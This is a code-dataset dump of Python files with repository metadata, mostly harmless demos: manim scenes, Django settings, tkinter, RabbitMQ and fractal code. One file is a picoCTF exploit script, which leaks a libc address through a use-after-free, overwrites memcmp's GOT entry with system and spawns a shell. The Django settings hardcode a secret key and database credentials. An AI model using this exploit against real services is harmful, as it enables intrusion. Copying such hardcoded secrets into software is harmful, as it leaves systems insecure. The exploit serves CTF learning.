blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8a87063d5cbebd2f8d469e9c7340e405764fc3b7 | 2c995ab8f04f8129372809c10242ea723aac86ef | /FirstTest/Scener.py | 3c5af0f90e8c7030c2b2bea8c9fc66d481daed97 | []
| no_license | ulmoDK/GymMatManimVideos | 002f6a26855a02d69cfc86d6472170dc78fd95d5 | defa85cfc4432807d9addbc82d3d9bd1333180ce | refs/heads/master | 2022-11-26T07:34:00.262388 | 2020-07-21T19:53:17 | 2020-07-21T19:53:17 | 281,488,472 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,200 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 18 21:28:25 2020
@author: ulmo
"""
import manimlib
from manimlib.imports import *
"""
def set_background(self):
background = Rectangle(
width = FRAME_WIDTH,
height = FRAME_HEIGHT,
stroke_width = 0,
fill_color = "#3E746F",
fill_opacity = 1)
self.add(background)
"""
class Scene1(Scene):
def construct(self):
#text = TextMobject("This is a regular text")
#self.play(Write(text))
#self.wait(3)
#set_background(self)
text1 = TextMobject("Det her er en sætning")
text2 = TextMobject("Grafisk løsning? På hvad? Og hvorfor?")
#text2.shift(DOWN*0.1,buff=1)
text2.next_to(text1,DOWN,buff=1)
self.add(text1)
self.wait(1)
self.play(Write(text2))
self.wait(3)
class Scene2(Scene):
def construct(self):
text = TextMobject("To ligninger, 2 ubekendte,")
text.scale(1.5)
formula1 = TexMobject("y=3 \cdot x -2")
formula1.scale(1.5)
formula2 = TexMobject("2 \cdot x","+","y","=","5","-2 \cdot x")
formula2.scale(1.5)
ab = TexMobject("a","b")
self.play(Write(text))
self.play(text.shift,2*UP)
self.play(Write(formula1))
self.play(formula1.shift,1*UP)
self.play(Write(formula2[:-1]))
self.wait(5)
self.play(
ReplacementTransform(formula2[0].copy(),formula2[-1]),
FadeOut(formula2[:2]),
run_time=2,
)
self.play(formula2[2:].shift,1.2*LEFT)
self.wait(2)
#self.play(Transform(for
class FormulaColor1(Scene):
def construct(self):
text = TexMobject("x","=","{a","\\over","b}")
text[0].set_color(RED)
text[1].set_color(BLUE)
text[2].set_color(GREEN)
text[3].set_color(ORANGE)
text[4].set_color("#DC28E2")
self.play(Write(text))
self.wait(2)
if __name__ == "__main__":
S1 = Scene1()
S2 = Scene2()
manimlib.play(S1)
manimlib.play(S2)
| [
"[email protected]"
]
| |
98c07bc117e7b12342e061b4f05594cc973f2a69 | a5ac50432e169e39d9854a045da6f7ec8b29a997 | /MongoTest/settings.py | 2dbe180fb431b80a6d9801d574cef17fdeb44240 | []
| no_license | burritorepo/Django-MongoDB | 4c8516d2c24b6644c7b2f53156ff9124a9032f46 | 4200bac5f8437d6260924038f2f5968a3d87e5f7 | refs/heads/master | 2020-06-16T11:30:44.109009 | 2019-05-20T04:59:09 | 2019-05-20T04:59:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,416 | py | """
Django settings for MongoTest project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import mongoengine
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'c4!mc+h+m)u2=#z#ef1f=+*5^yxrwnr+q1^9df3r0hl!@oz9qq'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
#'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'rest_framework_mongoengine'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
#'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
#'django.contrib.auth.middleware.AuthenticationMiddleware',
#'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'MongoTest.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'MongoTest.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.dummy'
}
}
_MONGODB_USER = 'hacodewr'
_MONGODB_PASSWD = 'abc123'
_MONGODB_HOST = 'localhost'
_MONGODB_NAME = 'admin'
_MONGODB_DATABASE_HOST = \
'mongodb://%s:%s@%s/%s' \
% (_MONGODB_USER, _MONGODB_PASSWD, _MONGODB_HOST, _MONGODB_NAME)
mongoengine.connect(_MONGODB_NAME, host= _MONGODB_DATABASE_HOST)
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
]
| |
65da08b0f3c75f793eca363ec016e0441370c495 | a47ac7c64cb6bb1f181eadff8e4b24735c19080a | /PythonStudy/9-Tkinter/4-Entry.py | fc6d9a973f75667cf9bcbae7cca69b495df559b5 | [
"MIT"
]
| permissive | CoderTitan/PythonDemo | 6dcc88496b181df959a9d43b963fe43a6e4cb032 | feb5ef8be91451b4622764027ac684972c64f2e0 | refs/heads/master | 2020-03-09T09:15:28.299827 | 2018-08-21T03:43:25 | 2018-08-21T03:43:25 | 128,708,650 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,321 | py | # 主窗口
import tkinter
# 验证输入的文字
def varileText():
text = entry4.get()
if text != '1':
print('对喽')
return True
print('错漏')
return False
#
def testInvaild():
print('invaildCommanf被调用')
return True
# 创建主窗口
window = tkinter.Tk()
# 设置标题
window.title('Titanjun')
# 设置窗口大小
window.geometry('400x400')
button = tkinter.Button(window, text='Titan', bg='#ff4040')
button.pack()
'''
输入控件
用于显示简单的文本内容
'''
vari = tkinter.Variable()
entry = tkinter.Entry(window, textvariable=vari)
entry.pack()
# 设置值
vari.set('very good')
# 取值
print(vari.get())
print(entry.get())
# 只读输入框
vari2 = tkinter.Variable()
entry2 = tkinter.Entry(window, textvariable=vari2, state='disabled')
entry2.pack()
# 设置值
vari2.set('very bad')
print(vari2.get())
# 密码输入框, 无论输入什么都显示密文
vari3 = tkinter.Variable()
entry3 = tkinter.Entry(window, textvariable=vari3, show='@', bg='red', fg='white')
entry3.pack()
# 验证输入的内容是否符合要求
vari4 = tkinter.Variable()
entry4 = tkinter.Entry(window, textvariable=vari4, validate='key', validatecommand=varileText, invalidcommand=testInvaild)
entry4.pack()
# 进入消息循环
window.mainloop()
| [
"[email protected]"
]
| |
9184a3cf90f6c87efee880a5df6da85bea92dc7a | ca0ff73a182fb8daf1478dba04683a5d0c205680 | /Spring/RabbitMQ_in_Depth/CH06/6.1 Direct Exchange.py | 3aea11462e4592c82025cd53d840b48dc2aef0d2 | []
| no_license | DawningTiger/Studio | 3db6c8f3e56600201947ffd0f652c76f663f328b | 0472979ea13ddb5d3a836bc9fc7dbd5d8f710c24 | refs/heads/master | 2023-04-27T18:28:05.502124 | 2019-11-07T05:53:11 | 2019-11-07T05:53:11 | 91,751,549 | 3 | 0 | null | 2023-04-21T20:39:53 | 2017-05-19T01:10:45 | HTML | UTF-8 | Python | false | false | 253 | py | import rabbitpy
with rabbitpy.Connection() as connection:
with connection.channel() as channel:
exchange = rabbitpy.Exchange(channel, 'direct-example',
exchange_type='direct')
exchange.declare()
| [
"[email protected]"
]
| |
4455e765ccd95b4a89c68bf96e906b8007962abf | 0acc2088392251ee40b3a187c4eb5d7bb3a7dfa5 | /dj8amjuly/mtopro/mtoapp/migrations/0001_initial.py | c15e6bab7d701f4e57b729d1212e94e183bccc5c | []
| no_license | devopstools2016/python_django_repo | 5747a54cb3ba89285323ba4b93b7ba22f5a29f5d | ccd61f990eb28639943829e7008982b60a8ed40e | refs/heads/master | 2020-07-25T07:02:04.512779 | 2019-09-13T06:41:50 | 2019-09-13T06:41:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,099 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Course',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),
('cname', models.CharField(max_length=100)),
('cost', models.IntegerField()),
],
),
migrations.CreateModel(
name='Student',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, serialize=False, auto_created=True)),
('name', models.CharField(max_length=100)),
('location', models.CharField(max_length=100)),
('email', models.EmailField(max_length=100)),
],
),
migrations.AddField(
model_name='course',
name='student',
field=models.ForeignKey(to='mtoapp.Student'),
),
]
| [
"[email protected]"
]
| |
10d2b852e2f224d780d3d3948914efb1963d11e2 | 4c05c92b6020d0e61a6a110b7562b86a256fc962 | /Turtle Magic.py | 08bbe144a0e10b500e4a1d59011b5ce512e606ad | []
| no_license | Aaron250907/PythonCourse1 | 9bd93696973720c262d49e26be453d3b54e240fd | 43fa7de48333ce953f7c3436cc77b9930e2142de | refs/heads/main | 2023-03-14T03:27:06.844190 | 2021-02-20T09:15:53 | 2021-02-20T09:15:53 | 340,611,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | import turtle
colors = ['red', 'blue','green', 'yellow', 'purple', 'orange']
t = turtle.Pen()
turtle.bgcolor('black')
for x in range(360):
t.pencolor(colors[x%6])
t.width(x/100 + 1)
t.forward(x)
t.left(59) | [
"[email protected]"
]
| |
ca17fee06b16873c1bf01a9602a2b6e6347d8b01 | f675a690b62250847b514ace399c2bb7860528f9 | /ZIFS.py | b0e5818588dee37abcd7d781d37fcfa637c0c83b | []
| no_license | adkingston/final-project-programs | a30b5bb5abcfbb4e95d19030c1e4ab2ec05c5034 | dd7db1a4484194162f756ae702743a05f7c7cd53 | refs/heads/master | 2021-01-13T10:14:31.507196 | 2017-08-18T16:56:21 | 2017-08-18T16:56:21 | 69,599,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | import numpy as np
import matplotlib.pyplot as plt
import pylab as pyl
D, R = np.arange(0.0, 1.0+1e-7, 0.1), np.arange(0.0, 2.0+1.e-7, 0.11)
A = [[a, b] for a in D for b in R]
def z1(s):
return [[0.25*x[0], 0.5*x[1]] for x in s]
def z2(s):
return [[-0.25*x[0]+0.5, -0.5*x[1]+2] for x in s]
def z3(s):
return [[-0.25*x[0] + 0.75, 0.5*x[1] + 1] for x in s]
def z4(s):
return [[0.25*x[0] + 0.75, 0.5*x[1] + 1] for x in s]
def iterations(ifs, seed, steps):
assert isinstance(ifs, list)
if steps < 1:
return seed
else:
next_step = []
for func in ifs:
next_step += func(seed)
next_step = iterations(ifs, next_step, steps-1)
return next_step
a = [[2., 3.]]
A1 = iterations([z1, z2, z3, z4], a, 7)
X1 = [z[0] for z in A1]
Y1 = [z[1] for z in A1]
# # # fig = plt.figure()
plt.plot(X1, Y1, 'bo', markersize=1, markeredgewidth=0.1)
pyl.show()
# fig.savefig("C:\\Users\\Alexander\\OneDrive\\Documents\\School
# \\University of St. Andrews\\Year 4\\MT4599
# Dissertation\\Main Document\\images\\A6.png")
# def hausdorff_dist(A, B):
# dists = []
# temp = []
# for a in A:
# for b in B:
# d = math.sqrt(abs(a[0] - b[0])**2 + abs(a[1] - b[1])**2)
# temp.append(d)
# dists.append(min(temp))
# temp = []
# return max(dists)
| [
"[email protected]"
]
| |
db5ed44277df8a9a1505f2c6cd8133d9978cf85d | 9f487f679ef9cf9399058fa92f682a4f425e90d5 | /2014/pico-ctf/master-challenge/fancy_cache/exploit.py | 80ca9099c4d48c3071c00e862b1730391a09f912 | [
"MIT"
]
| permissive | zachriggle/pwntools-write-ups | 20693babacc4a58f32d403f538f20bd133d36588 | b81859e61c05dc80e8209b8a024a7c6b9691f1b3 | refs/heads/master | 2021-01-17T22:43:20.415143 | 2015-03-14T18:11:19 | 2015-03-14T18:11:19 | 22,653,774 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,075 | py | #!/usr/bin/python
from pwn import *
import socket
import telnetlib
"""
The original client has a pack4/unpack4 method that takes a 32 bit integer
and returns a 4 byte string representing the number in little endian.
With pwntools you have already access to the standard struct.pack and struct.unpack
functions as well as support for packing/unpacking arbitrary-width integers.
"""
CACHE_GET = 0
CACHE_SET = 1
kNotFound = 0x0
kFound = 0x1
kCacheFull = 0x2
def write_string(f, s):
# Packs an 32-bit integer
f.write(p32(len(s)))
f.write(s)
def read_string(f):
# Unpacks a 32-bit integer
size = u32(f.read(4))
return f.read(size)
def cache_get(f, key):
f.write(chr(CACHE_GET))
write_string(f, key)
status = ord(f.read(1))
if status == kNotFound:
return None
assert status == kFound
return read_string(f)
# We need this modified function, because once we hit system('/bin/sh'),
# there will be no more data sent back in the way that the original
# function expects. This causes it to b0rk.
def cache_get2(f, key):
f.write(chr(CACHE_GET))
write_string(f, key)
def cache_set(f, key, value, lifetime):
f.write(chr(CACHE_SET))
write_string(f, key)
status = ord(f.read(1))
if status == kCacheFull:
return False
assert status == kFound
write_string(f, value)
f.write(p32(lifetime))
return True
###settings
local = True
s = socket.socket()
if not local:
target = 'vuln2014.picoctf.com'
port = 4548
else:
target = 'localhost'
port = 1337
s.connect((target, port))
log.info('Target: %s' % target)
f = s.makefile('rw', bufsize=0)
# It's useful to pause the client right after connecting so that you can
# attach to the server with gdb if desired.
# raw_input()
# Command to be executed later, once we've overwritten memcmp@plt.
cmd = '/bin/sh\x00'
# Add an entry to the cache; we will use this command later to spawn the shell.
cache_set(f, cmd, "payload", 1000)
# Add an entry with a negative lifetime. This will fool cache_lookup, because it only checks for zero:
'''
// Skip expired cache entries.
if (entry->lifetime == 0) {
continue;
}
'''
cache_set(f, 'keyAAAA', 'AAAA____', 0xffffffff)
# Request that value, causing it to be deleted from cache
cache_get(f, 'keyAAAA')
'''
// This is how the string struct looks like:
struct string {
size_t length;
size_t capacity;
char *data;
};
'''
# Now, we request the value of a key called '\x04\x00\x00\x00\x00\x00\x00\..."
# but this is read into the old "value" struct (used to be 0x8, 0x0, *(AAAA____)),
# because malloc will re-use this address.
# Leak memcmp address @ 0x804b014
cache_get(f, p32(4)+p32(4)+p32(0x804b014))
# This is read into the old "key" struct (used to be 0x7, 0x0, *(keyAAAA))
# We supply the address of 'printf', so the check will pass & we read whatever is at value->data
cache_get(f, p32(6)+p32(6)+p32(0x8048310))
# Grab memcmp address:
addr_memcmp = u32(cache_get(f, 'printf'))
log.info("Leaking memcmp address: %s", hex(addr_memcmp))
# Calculate system address:
if local:
# This hardcode address works for Ubuntu 12.04, libc v. 2.15
offset = 0x000f2b70
else:
# Does not work anymore :(
offset = 0x142870 + 0x40100
log.info("Subtracting offset: %s", hex(offset))
addr_system = addr_memcmp - offset
log.info("Calculated system address: %s", hex(addr_system))
# Now we have to overwrite memcmp @ 0x804b014. The hints say we can do this with cache_set.
# We'd love to abuse our old cache entry again, but alas, the memory regions have again been
# freed(), due to cache_get seeing a lifetime <= 0.
# We'll restore them, so we can abuse them again to write to 0x804b014.
cache_get(f, p32(4)+p32(4)+p32(0x804b014))
cache_get(f, p32(6)+p32(0)+p32(0x8048310))
log.info("Attempting to overwrite memcmp pointer...")
assert cache_set(f, 'printf', p32(addr_system), 1)
log.info("Running {} on remote box".format(cmd))
log.info(cache_get2(f, cmd))
t = telnetlib.Telnet()
t.sock = s
log.info('Connection established')
t.interact() | [
"[email protected]"
]
| |
9edb6fb910255cf29713ca49bd8f2e57d1186ea7 | a5aa3e80fe2e97cc9de3d42be873fdf468a68968 | /a10_openstack_lib/resources/a10_scaling_group.py | 312cd817ddd0ea9bc95f2784cacf72012e30ba03 | [
"Apache-2.0"
]
| permissive | Cedev/a10-openstack-lib | 60911420f781db99f9d7456be5c4c707985c3c2d | 23c6a5ae2cfaeb5bb950e96be3a79c3b0e014247 | refs/heads/master | 2020-04-05T22:53:54.765410 | 2016-06-07T23:02:01 | 2016-06-07T23:02:01 | 61,076,970 | 0 | 0 | null | 2016-06-13T23:41:50 | 2016-06-13T23:41:49 | Python | UTF-8 | Python | false | false | 12,633 | py | # Copyright (C) 2016 A10 Networks Inc. All rights reserved.
EXTENSION = 'a10-scaling-group'
SERVICE = "A10_SCALING_GROUP"
SCALING_GROUPS = 'a10_scaling_groups'
SCALING_GROUP = 'a10_scaling_group'
SCALING_GROUP_WORKERS = 'a10_scaling_group_workers'
SCALING_GROUP_WORKER = 'a10_scaling_group_worker'
SCALING_POLICIES = 'a10_scaling_policies'
SCALING_POLICY = 'a10_scaling_policy'
SCALING_ALARMS = 'a10_scaling_alarms'
SCALING_ALARM = 'a10_scaling_alarm'
SCALING_ACTIONS = 'a10_scaling_actions'
SCALING_ACTION = 'a10_scaling_action'
ALARM_UNITS = ['count', 'percentage', 'bytes']
ALARM_AGGREGATIONS = ['avg', 'min', 'max', 'sum']
ALARM_MEASUREMENTS = ['connections', 'memory', 'cpu', 'interface']
ALARM_OPERATORS = ['>=', '>', '<=', '<']
ALARM_PERIOD_UNITS = ['minute', 'hour', 'day']
ACTIONS = ['scale-in', 'scale-out']
RESOURCE_ATTRIBUTE_MAP = {
SCALING_GROUPS: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'scaling_policy_id': {
'allow_post': True,
'allow_put': True,
'validate': {
'a10_type:nullable': {
'type:uuid': None,
'a10_type:reference': SCALING_POLICY
}
},
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
}
},
SCALING_GROUP_WORKERS: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'scaling_group_id': {
'allow_post': True,
'allow_put': False,
'validate': {
'type:uuid': None,
'a10_type:reference': SCALING_GROUP
},
'is_visible': True
},
'host': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True
},
'username': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True
},
'password': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': False
},
'api_version': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:values': ['2.1', '3.0']
},
'is_visible': True
},
'protocol': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:values': ['http', 'https']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
},
'port': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:range': [0, 65535]
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
},
'nova_instance_id': {
'allow_post': False,
'allow_put': False,
'validate': {
'type:uuid': None
},
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
}
},
SCALING_POLICIES: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'cooldown': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:non_negative': None
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
'default': 300,
},
'min_instances': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:non_negative': None
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
'default': 1,
},
'max_instances': {
'allow_post': True,
'allow_put': True,
'validate': {
'a10_type:nullable': {
'type:non_negative': None
}
},
'convert_to': lambda attr: convert_nullable(attr.convert_to_int),
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
},
'reactions': {
'allow_post': True,
'allow_put': True,
'convert_list_to': lambda attr: attr.convert_kvp_list_to_dict,
'is_visible': True,
'default': lambda attr: attr.ATTR_NOT_SPECIFIED
}
},
SCALING_ALARMS: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'aggregation': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['avg', 'min', 'max', 'sum']
},
'is_visible': True,
'convert_to': lambda attr: convert_to_lower,
'default': 'avg'
},
'measurement': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['connections', 'memory', 'cpu', 'interface']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True
},
'operator': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['>=', '>', '<=', '<']
},
'is_visible': True
},
'threshold': {
'allow_post': True,
'allow_put': True,
'validate': {
'a10_type:float': None
},
'convert_to': lambda attr: convert_to_float,
'is_visible': True
},
'unit': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['count', 'percentage', 'bytes']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True
},
'period': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:non_negative': None
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
},
'period_unit': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['minute', 'hour', 'day']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True
}
},
SCALING_ACTIONS: {
'id': {
'allow_post': False,
'allow_put': True,
'validate': {
'type:uuid': None
},
'is_visible': True,
'primary_key': True
},
'tenant_id': {
'allow_post': True,
'allow_put': False,
'required_by_policy': True,
'is_visible': True
},
'name': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': ''
},
'description': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:string': None
},
'is_visible': True,
'default': '',
},
'action': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:values': ['scale-in', 'scale-out']
},
'convert_to': lambda attr: convert_to_lower,
'is_visible': True
},
'amount': {
'allow_post': True,
'allow_put': True,
'validate': {
'type:non_negative': None
},
'convert_to': lambda attr: attr.convert_to_int,
'is_visible': True,
},
}
}
def convert_to_lower(input):
try:
return input.lower()
except AttributeError:
return input
def convert_to_float(input):
try:
return float(input)
except ValueError:
return input
def convert_nullable(convert_value):
def f(input):
if input is not None:
return convert_value(input)
return None
return f
def validate_float(data, options):
if not isinstance(data, float):
return "'%s' is not a number" % input
def validate_reference(data, options):
"""Referential integrity is enforced by the data model"""
return None
def validate_nullable(validators):
def f(data, options):
if data is not None:
for rule in options:
value_validator = validators[rule]
reason = value_validator(data, options[rule])
if reason:
return reason
return f
VALIDATORS = {
'a10_type:float': lambda validators: validate_float,
'a10_type:reference': lambda validators: validate_reference,
'a10_type:nullable': validate_nullable
}
| [
"[email protected]"
]
| |
d419a8ab94fbec9063ce80b6bb673d0e9abb7763 | 4e518317ee5b13a24c613fdc1451c88dc89d5fcc | /Fibonacci.py | ea3432eb276d7b7a1bf8c1d95f58120e05e63105 | []
| no_license | nourkhaled/Python | ab7ac8db937463749cabbb8a87f2c4b9c7c6b56f | 83d363b8e1ff1ca0325925a8e4f25403d9d90591 | refs/heads/master | 2020-06-20T02:04:58.872215 | 2019-07-17T13:10:35 | 2019-07-17T13:10:47 | 196,953,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Jul 17 10:23:38 2019
@author: IST
"""
def fibonacci (eleNum):
i= 1
if eleNum == 0 :
fib = []
elif eleNum ==1 :
fib =[1]
elif eleNum ==2:
fib = [1,1]
elif eleNum > 2:
fib = [1,1]
while i < eleNum - 1:
fib.append(fib[i] +fib [i-1])
i+=1
return fib
ele = int (input("Enter a number to generate a fiboncci with it ...."))
print(fibonacci(ele))
| [
"[email protected]"
]
| |
07ae406d8c86434e6d9828f79c80cc7113e9e530 | 647d9874e51e617ed351aeff9954e4c7318af6d8 | /attendance/get_data.py | c47ab87db19774cbf6f5059697d76c3e223dbefa | []
| no_license | technophilic/vityBot | 99c33a550503e1b590417c12627420c649ebd5b0 | 6f7a5a43a85bd7da5fd46e3154b46a1cc9b9e296 | refs/heads/master | 2021-01-01T17:08:35.251511 | 2017-07-21T16:35:21 | 2017-07-21T16:35:21 | 98,008,802 | 0 | 0 | null | 2017-07-22T05:19:07 | 2017-07-22T05:19:07 | null | UTF-8 | Python | false | false | 942 | py | import requests
base = 'https://myffcs.in:10443/campus/vellore/'
login = '/login/'
personal_details = '/personalDetails/'
edu_details = '/educationalDetails/'
exam_schedule = '/examSchedule/'
messages = '/messages/'
refresh = '/refresh/'
class LoginError(Exception):
def __init__(self):
self.message = 'Error logging in'
class InvalidCredentials(Exception):
def __init__(self):
self.message = 'Invalid login credentials'
def process_login(login_info):
url = base + login
res = requests.post(url, login_info.getDict())
res_dict = res.json()
if res_dict['status']['code'] == 12:
raise InvalidCredentials
elif res_dict['status']['code'] != 0:
raise LoginError
return res_dict
def get_course_details(login_info):
url = base + refresh
process_login(login_info)
res = requests.post(url, login_info.getDict())
res_dict = res.json()
return res_dict
| [
"[email protected]"
]
| |
720ea0442ba601347f0f785738e5a5cf39923cf8 | b4692ccd9b46fb661a70575f88fbc7de50a08eee | /test.py | 01008d40647fedaff9cfc0ac8e9b7105f8cea04d | []
| no_license | 18516264210/MachineLearning | 20383fae121c0abb0f86dd9e614074dce63b4eb5 | c0d60f24bfe75788a1b59ce1918d692f0e5c46d9 | refs/heads/master | 2021-04-04T01:43:25.870375 | 2020-03-19T04:56:21 | 2020-03-19T04:56:21 | 248,413,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py |
from printff import Printf
if __name__=="__main__":
p = Printf("zhang","19")
p.new_print() | [
"[email protected]"
]
| |
e5e03b4381e41a2e2b390040d6116fa7769744d3 | 2bb5f179db740ab6335fa1c221a80995857ad43a | /Unit1/Exercises/WeekendProjectTTeller/app/view.py | d11bad232a4166bf61f79a42a501e3ca08e89f1c | []
| no_license | acrainier1/BytePhase1 | 77cecce542012218317b8840b8ad74688bd9150c | 6c1db7fd5569540dcd7c4ba6932e25d2a709ac15 | refs/heads/master | 2020-08-27T11:32:35.189211 | 2019-11-22T00:19:10 | 2019-11-22T00:19:10 | 217,352,349 | 0 | 0 | null | 2019-10-24T17:11:16 | 2019-10-24T17:11:16 | null | UTF-8 | Python | false | false | 1,165 | py |
def print_login_menu():
print("""Welcome to Terminal Teller!:
1) create account
2) log in
3) quit
""")
def login_prompt():
return input("Your choice:")
def bad_login_input():
print("Input not recognized\n")
def goodbye():
print(" Goodbye!\n")
def print_main_menu(user):
